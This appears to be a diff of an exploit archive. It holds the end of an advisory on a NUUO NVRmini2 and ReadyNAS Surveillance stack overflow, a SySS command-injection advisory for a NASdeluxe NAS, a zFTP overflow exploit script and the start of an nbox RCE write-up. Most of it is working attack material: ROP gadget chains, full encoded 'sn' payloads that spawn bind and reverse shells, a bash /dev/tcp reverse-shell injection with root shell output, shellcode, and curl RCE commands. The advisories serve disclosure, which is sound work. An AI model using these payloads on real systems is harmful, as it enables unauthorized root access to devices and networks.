aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa4444555566667777PPPPaaaaaaaaaaaaSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS
|
||||
|
||||
aaaa: filler
|
||||
PPPP: pc / lr register content, offset 976
|
||||
4444: r4 register content, offset 962
|
||||
5555: r5 register content, offset 966
|
||||
6666: r6 register content, offset 970
|
||||
7777: r7 register content, offset 974
|
||||
SSSS: start of stack pointer, offset 992
|
||||
|
||||
> On the ReadyNAS Surveillance one additional register (r8) can be controlled:
|
||||
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa44445555666677778888PPPPaaaaaaaaaaaaSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS
|
||||
|
||||
aaaa: filler
|
||||
PPPP: pc / lr register content, offset 986
|
||||
4444: r4 register content, offset 968
|
||||
5555: r5 register content, offset 970
|
||||
6666: r6 register content, offset 974
|
||||
7777: r7 register content, offset 978
|
||||
8888: r8 register content, offset 982
|
||||
SSSS: start of stack pointer, offset 1002
|
||||
|
||||
> Exploit mitigations and constraints
|
||||
The table below shows the exploit mitigation technologies for each target:
|
||||
NVRmini2 ReadyNAS
|
||||
NX Y Y
|
||||
RELRO Partial Partial
|
||||
ASLR N Y
|
||||
|
||||
An additional constraint to keep in mind is that there can be no null bytes in the exploit as the vulnerability is in the sprintf copy operation (which uses a null byte as the string terminator).
|
||||
|
||||
> Exploitation in the NVRmini2 (firmware v3.0.0):
|
||||
This example exploit creates a root bind shell on port 4444 using ROP gadgets to bypass NX. The gadgets were taken from libc-2.15.so, which is always loaded at 4066c000 in firmware 3.0.0.
|
||||
|
||||
0x00018ba0 : pop {r3, lr} ; bx lr -> located at 40684BA0 (first gadget, sets up r3 for the next gadget)
|
||||
0x000f17cc : mov r0, sp ; blx r3 -> located at 4075D7CC (second gadget, set up args for system)
|
||||
0x00039ffc : system() -> located at 406A5FFC (takes the argument from r0 - pointing to sp - and executes it)
|
||||
Payload (in the stack) -> %6e%63%20%2d%6c%20%2d%70%20%34%34%34%34%20%2d%65%20%2f%62%69%6e%2f%73%68%20%26 ("nc -l -p 4444 -e /bin/sh &")
|
||||
|
||||
Illustration:
|
||||
sn=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa{first_gadget}aaaaaaaaaaaa{system()_address}{second_gadget}{stack}
|
||||
|
||||
Exploit for NVRmini2 firmware v3.0.0 ("sn" parameter value):
|
||||
sn=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%a0%4b%68%40aaaaaaaaaaaa%fc%5f%6a%40%cc%d7%75%40%6e%63%20%2d%6c%20%2d%70%20%34%34%34%34%20%2d%65%20%2f%62%69%6e%2f%73%68%20%26
|
||||
|
||||
Other firmware versions will have different gadget addresses. On version 3.0.0 it should work without any modification.
|
||||
|
||||
> Exploitation on ReadyNAS Surveillance (version v1.1.2):
|
||||
To develop this example exploit libcrypto.so.0.9.8 was used. The library is loaded at B6xxx000, where xxx are 4096 possible values for the memory address, as the ReadyNAS has a weak form of ASLR. For this exploit, B6CCE000 was chosen as the target base address (this was chosen randomly from a sample of collected base addresses).
|
||||
|
||||
The exploit connects a reverse shell to 192.168.133.204:4444 using OpenSSL. The following ROP gadgets were used:
|
||||
0x000b3d9c : mov r1, sp ; mov r2, ip ; blx r6 -> located at B6D81D9C (first gadget, gets the location of the stack pointer sp, where the shellcode is located, in r1)
|
||||
0x00008690 : movs r0, r1 ; movs r0, r0 ; movs r2, r2 ; movs r2, r1 ; bx r7 -> located at B6CD6691 as this is a THUMB mode gadget (second gadget, sets up the arguments to system(), putting them into r0)
|
||||
0xb6ef91bc: fixed system() address when B6CCE000 is chosen as the base address of libcrypto.so.0.9.8 (takes the argument from r0 - pointing to sp - and executes it)
|
||||
Payload: (in the stack) -> %6d%6b%66%69%66%6f%20%2f%74%6d%70%2f%73%3b%20%2f%62%69%6e%2f%62%61%73%68%20%2d%69%20%3c%20%2f%74%6d%70%2f%73%20%32%3e%26%31%20%7c%20%6f%70%65%6e%73%73%6c%20%73%5f%63%6c%69%65%6e%74%20%2d%71%75%69%65%74%20%2d%63%6f%6e%6e%65%63%74%20%31%39%32%2e%31%36%38%2e%31%33%33%2e%32%30%34%3a%34%34%34%34%20%3e%20%2f%74%6d%70%2f%73%3b%20%72%6d%20%2f%74%6d%70%2f%73%20%26 ("mkfifo /tmp/s; /bin/bash -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 192.168.133.204:4444 > /tmp/s; rm /tmp/s &")
|
||||
|
||||
Illustration:
|
||||
sn=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa{second_gadget}{system_address}aaaa{first_gadget}aaaaaaaaaaaa{payload}
|
||||
|
||||
Exploit for ReadyNAS Surveillance v1.1.2 ("sn" parameter value):
|
||||
sn=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%91%66%cd%b6%bc%91%ef%b6aaaa%9c%1d%d8%b6aaaaaaaaaaaa%6d%6b%66%69%66%6f%20%2f%74%6d%70%2f%73%3b%20%2f%62%69%6e%2f%62%61%73%68%20%2d%69%20%3c%20%2f%74%6d%70%2f%73%20%32%3e%26%31%20%7c%20%6f%70%65%6e%73%73%6c%20%73%5f%63%6c%69%65%6e%74%20%2d%71%75%69%65%74%20%2d%63%6f%6e%6e%65%63%74%20%31%39%32%2e%31%36%38%2e%31%33%33%2e%32%30%34%3a%34%34%34%34%20%3e%20%2f%74%6d%70%2f%73%3b%20%72%6d%20%2f%74%6d%70%2f%73%20%26
|
||||
|
||||
Note that due to the ASLR in the ReadyNAS his exploit has be attempted at few times in order for it to work. Usually less than 20 tries is enough to get the reverse shell to connect back.
|
||||
|
||||
> Local exploitation:
|
||||
This vulnerability can be exploited locally by a logged in user to escalate privileges to root on the NVRmini2 and admin on the ReadyNAS with the following command:
|
||||
CGI_DEBUG=qwe23622260 cgi_main transfer_license 'method=offline&sn=<PAYLOAD>'
|
||||
The cgi_main binary is located at "/apps/surveillance/bin/cgi_main" on the ReadyNAS and "/NUUO/bin/cgi_main" on the NVRmini2.
|
||||
|
||||
It is likely that all other vulnerabilities in this advisory are exploitable by a local attacker, however this has only been tested for the stack buffer overflow.
|
||||
|
||||
|
||||
>> Fix:
|
||||
NETGEAR and Nuuo did not respond to CERT/CC coordination efforts (see Timeline below), so no fix is available.
|
||||
Do not expose any of these devices to the Internet or any networks with unstrusted hosts.
|
||||
|
||||
Timeline:
|
||||
28.02.2016: Disclosure to CERT/CC.
|
||||
27.04.2016: Requested status update from CERT - they did not receive any response from vendors.
|
||||
06.06.2016: Requested status update from CERT - still no response from vendors.
|
||||
Contacted Nuuo and NETGEAR directly. NETGEAR responded with their "Responsible Disclosure Guidelines", to which I did not agree and requested them to contact CERT if they want to know the details about the vulnerabilities found. No response from Nuuo.
|
||||
13.06.2016: CERT sent an update saying that NETGEAR has received the details of the vulnerabilities, and they are attempting to contact Nuuo via alternative channels.
|
||||
07.07.2016: CERT sent an update saying that they have not received any follow up from both Nuuo and NETGEAR, and that they are getting ready for disclosure.
|
||||
17.07.2016: Sent an email to NETGEAR and Nuuo warning them that disclosure is imminent if CERT doesn't receive a response or status update. No response received.
|
||||
01.08.2016: Sent an email to NETGEAR and Nuuo warning them that disclosure is imminent if CERT doesn't receive a response or status update. No response received.
|
||||
04.08.2016: Coordinated disclosure with CERT.
|
||||
|
||||
|
||||
>> References:
|
||||
[1] https://www.kb.cert.org/vuls/id/856152
|
||||
|
||||
|
||||
================
|
||||
Agile Information Security Limited
|
||||
http://www.agileinfosec.co.uk/
|
||||
>> Enabling secure digital business >>
|
139
platforms/hardware/webapps/40207.txt
Executable file
139
platforms/hardware/webapps/40207.txt
Executable file
|
@ -0,0 +1,139 @@
|
|||
-----BEGIN PGP SIGNED MESSAGE-----
|
||||
Hash: SHA512
|
||||
|
||||
Advisory ID: SYSS-2016-065
|
||||
Product: NASdeluxe NDL-2400r
|
||||
Vendor: Starline Computer GmbH
|
||||
Affected Version(s): 2.01.10
|
||||
Tested Version(s): 2.01.09
|
||||
Vulnerability Type: OS Command Injection (CWE-78)
|
||||
Risk Level: High
|
||||
Solution Status: no fix (product has reached EOL since 3 years)
|
||||
Vendor Notification: 2016-07-04
|
||||
Public Disclosure: 2016-08-03
|
||||
CVE Reference: Not assigned
|
||||
Author of Advisory: Klaus Eisentraut, SySS GmbH, https://www.syss.de/advisories/
|
||||
|
||||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
|
||||
Overview:
|
||||
|
||||
The product "NASdeluxe NDL-2400r" [3] is vulnerable to OS Command Injection
|
||||
as root. No credentials are required to exploit this vulnerability.
|
||||
|
||||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
|
||||
Vulnerability Details / Proof-of-Concept:
|
||||
|
||||
The language parameter in the web interface login request of the product
|
||||
"NASdeluxe NDL-2400r" is vulnerable to an OS Command Injection as root.
|
||||
The SySS GmbH sent the following HTTPS request to the webinterface:
|
||||
|
||||
~~~~~
|
||||
POST /usr/usrgetform.html?name=index HTTP/1.1
|
||||
Host: 192.168.1.1
|
||||
Connection: close
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 97
|
||||
|
||||
lang=||`bash+-i+>%26+/dev/tcp/192.168.1.2/443+0>%261`&username=&pwd=&site=web_disk&login_btn=Einloggen
|
||||
~~~~~
|
||||
|
||||
After sending the request, a reverse shell connected back:
|
||||
|
||||
~~~~~
|
||||
# nc -lvvp 443
|
||||
Listening on any address 443 (https)
|
||||
Connection from 192.168.1.1:49070
|
||||
bash: no job control in this shell
|
||||
bash-3.00# whoami
|
||||
root
|
||||
bash-3.00# cat /img/version
|
||||
2.01.09
|
||||
~~~~~
|
||||
|
||||
The tested firmware version was 2.01.09. The most current version is
|
||||
2.01.10 according to the web page of the vendor [3]. However there are
|
||||
no hints of a security update in the release notes [4]. Thus, the SySS
|
||||
GmbH assumes that this vulnerability is likely also present in the most
|
||||
current firmware version from 2009-10-22.
|
||||
|
||||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
|
||||
Solution:
|
||||
|
||||
The product has reached end-of-life (EOL) status since more than three
|
||||
years. Thus, no patch will be provided by the vendor.
|
||||
|
||||
It is highly recommended to migrate to one of the newer and still
|
||||
supported NAS solutions which are (according to Starline Computer GmbH)
|
||||
not affected by this vulnerability.
|
||||
|
||||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
|
||||
Disclosure Timeline:
|
||||
|
||||
2016-06-29: Vulnerability discovered
|
||||
2016-07-04: asked info@starline.de for contact person (no answer)
|
||||
2016-07-22: sent this advisory to info@starline.de
|
||||
2016-07-22: response from vendor: won't fix (product reached EOL >3 years)
|
||||
2016-08-03: public disclosure
|
||||
|
||||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
|
||||
References:
|
||||
|
||||
[1] SySS GmbH, SYSS-2016-065
|
||||
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-065.txt
|
||||
[2] SySS GmbH, SySS Responsible Disclosure Policy
|
||||
https://www.syss.de/en/news/responsible-disclosure-policy/
|
||||
[3] NASdeluxe Homepage
|
||||
https://www.nasdeluxe.com/
|
||||
[4] NDL-2400R Firmware Release Notes
|
||||
https://www.nasdeluxe.com/wp-content/uploads/2008/12/NDL-2400R_NDL-2500T_FWRN_v2_01_10.171.pdf
|
||||
|
||||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
|
||||
Credits:
|
||||
|
||||
This security vulnerability was found by Klaus Eisentraut of the SySS
|
||||
GmbH.
|
||||
|
||||
E-Mail: klaus.eisentraut@syss.de
|
||||
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Klaus_Eisentraut.asc
|
||||
Key ID: 0xBAC677AE
|
||||
Key Fingerprint: F5E8 E8E1 A414 4886 0A8B 0411 DAB0 4DB5 BAC6 77AE
|
||||
|
||||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
|
||||
Disclaimer:
|
||||
|
||||
The information provided in this security advisory is provided "as is"
|
||||
and without warranty of any kind. Details of this security advisory may
|
||||
be updated in order to provide as accurate information as possible. The
|
||||
latest version of this security advisory is available on the SySS Web
|
||||
site.
|
||||
|
||||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
|
||||
Copyright:
|
||||
|
||||
Creative Commons - Attribution (by) - Version 3.0
|
||||
URL: http://creativecommons.org/licenses/by/3.0/deed.en
|
||||
|
||||
-----BEGIN PGP SIGNATURE-----
|
||||
|
||||
iQIcBAEBCgAGBQJXoddNAAoJENqwTbW6xneuMdwQANnc0LC5n+5Hz/jd/C4y6Vo/
|
||||
V4rTM2ZeKHoinwaNe8wDqwLojVi370xkroe592skBuGaHsACpqVU/+i1uzez4Fd5
|
||||
zv9FL0O16qeU4ATt0tlTMzBka+3l7+W46JjIt30auKXvb2C7HXlwru58HvMRoDUr
|
||||
5ga48/C2tLAWeogR0hpflXg6xUmTTfZRL1zgEh4/etz8vA0DgwXl7fRQZq7z2fDF
|
||||
L4oSrQ2oumS+IWH8qAUo/Tvd8al/OSQC+QfLjwxhpwb3n8nRrUaa2gYLuKvSXn3R
|
||||
Sc8nuR+YuO4c+kXcUO2HQ2mpmSRKITOGOgqDwxiSHitTpGwkJiwh2PwRP45BJxTe
|
||||
g99ivjeRUKkXlAkNZ3u38OYzSmPcf455fwGANFaBjljJtd5Z+Je9mqL2jnUvB1O1
|
||||
ERFuyhDr1VKLiM4BQp3/hgqECHQRjiX7jUN0yHA3PWiM55wzHyftAti5K/XKSKTv
|
||||
tFB19VoC+oJEA1i19uzv7xFscfiPHuRw0coGP2KSVwA2L3bIOLlMwWt/Ea/Qzcur
|
||||
9JIUHX0+kKxJcLb6hthasQ4lIf2Jhjd4aFR+rPcJLL29r7HGOSoQLErXz2QmcePJ
|
||||
1jKC6O2N2vrmrIZ+JOvWP99v0bIqC/857Xz5p30OUUjx2yLjpP/t5paidH1qlUMs
|
||||
4mefqh41S76I3EZJpQn3
|
||||
=V6E3
|
||||
-----END PGP SIGNATURE-----
|
66
platforms/linux/local/40203.py
Executable file
66
platforms/linux/local/40203.py
Executable file
|
@ -0,0 +1,66 @@
|
|||
# Exploit developed using Exploit Pack v5.4
|
||||
# Exploit Author: Juan Sacco - http://www.exploitpack.com -
|
||||
# jsacco@exploitpack.com
|
||||
# Program affected: zFTP Client
|
||||
# Affected value: NAME under FTP connection
|
||||
# Where in the code: Line 30 in strcpy_chk.c
|
||||
# __strcpy_chk (dest=0xb7f811c0 <cdf_value> "/KUIP", src=0xb76a6680
|
||||
"/MACRO", destlen=0x50) at strcpy_chk.c:30
|
||||
# Version: 20061220+dfsg3-4.1
|
||||
#
|
||||
# Tested and developed under: Kali Linux 2.0 x86 - https://www.kali.org
|
||||
# Program description: ZFTP is a macro-extensible file transfer
|
||||
program which supports the
|
||||
# transfer of formatted, unformatted and ZEBRA RZ files
|
||||
# Kali Linux 2.0 package: pool/main/c/cernlib/zftp_20061220+dfsg3-4.1_i386.deb
|
||||
# MD5sum: 524217187d28e4444d6c437ddd37e4de
|
||||
# Website: http://cernlib.web.cern.ch/cernlib/
|
||||
#
|
||||
# gdb$ run `python -c 'print "A"*30'`
|
||||
# Starting program: /usr/bin/zftp `python -c 'print "A"*30'`
|
||||
# *** buffer overflow detected ***: /usr/bin/zftp terminated
|
||||
# ======= Backtrace: =========
|
||||
# /lib/i386-linux-gnu/i686/cmov/libc.so.6(+0x6c773)[0xb6fd1773]
|
||||
# /lib/i386-linux-gnu/i686/cmov/libc.so.6(__fortify_fail+0x45)[0xb7061b85]
|
||||
# /lib/i386-linux-gnu/i686/cmov/libc.so.6(+0xfac3a)[0xb705fc3a]
|
||||
# /lib/i386-linux-gnu/i686/cmov/libc.so.6(__strcpy_chk+0x37)[0xb705f127]
|
||||
# /usr/lib/i386-linux-gnu/libpacklib.so.1_gfortran(csetup+0x1a4)[0xb7417864]
|
||||
# /usr/lib/i386-linux-gnu/libpacklib.so.1_gfortran(csetup_+0x24)[0xb7418604]
|
||||
# /usr/lib/i386-linux-gnu/libpacklib.so.1_gfortran(czopen_+0xd4)[0xb73f6d14]
|
||||
# /usr/bin/zftp[0x804dc9b]
|
||||
|
||||
import os, subprocess
|
||||
|
||||
def run():
|
||||
try:
|
||||
print "# zFTP Client - Local Buffer Overflow by Juan Sacco"
|
||||
print "# This Exploit has been developed using Exploit Pack -
|
||||
http://exploitpack.com"
|
||||
# NOPSLED + SHELLCODE + EIP
|
||||
|
||||
buffersize = 100
|
||||
nopsled = "\x90"*30
|
||||
shellcode =
|
||||
"\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
|
||||
eip = "\x40\xf3\xff\xbf"
|
||||
buffer = nopsled * (buffersize-len(shellcode)) + eip
|
||||
subprocess.call(["zftp ",' ', buffer])
|
||||
|
||||
except OSError as e:
|
||||
if e.errno == os.errno.ENOENT:
|
||||
print "Sorry, zFTP client- Not found!"
|
||||
else:
|
||||
print "Error executing exploit"
|
||||
raise
|
||||
|
||||
def howtousage():
|
||||
print "Snap! Something went wrong"
|
||||
sys.exit(-1)
|
||||
|
||||
if __name__ == '__main__':
|
||||
try:
|
||||
print "Exploit zFTP Client - Local Overflow Exploit"
|
||||
print "Author: Juan Sacco - Exploit Pack"
|
||||
except IndexError:
|
||||
howtousage()
|
||||
run()
|
65
platforms/linux/remote/40201.txt
Executable file
65
platforms/linux/remote/40201.txt
Executable file
|
@ -0,0 +1,65 @@
|
|||
E-DB Note: Source ~ http://carnal0wnage.attackresearch.com/2016/08/got-any-rces.html
|
||||
|
||||
(The issues were found originally in nbox 2.3 and confirmed in nbox 2.5)
|
||||
|
||||
|
||||
|
||||
To make things easier, I created a Vagrantfile with provisioning so you can have your own nbox appliance and test my findings or give it a shot. There is more stuff to be found, trust me :)
|
||||
|
||||
https://github.com/javuto/nbox-pwnage
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
*Replace NTOP-BOX with the IP address of your appliance (presuming that you already logged in). Note that most of the RCEs are wrapped in sudo so it makes the pwnage much more interesting:
|
||||
|
||||
RCE: POST against https://NTOP-BOX/ntop-bin/write_conf_users.cgi with parameter cmd=touch /tmp/HACK
|
||||
curl -sk --user nbox:nbox --data 'cmd=touch /tmp/HACK' 'https://NTOP-BOX/ntop-bin/write_conf_users.cgi'
|
||||
|
||||
|
||||
|
||||
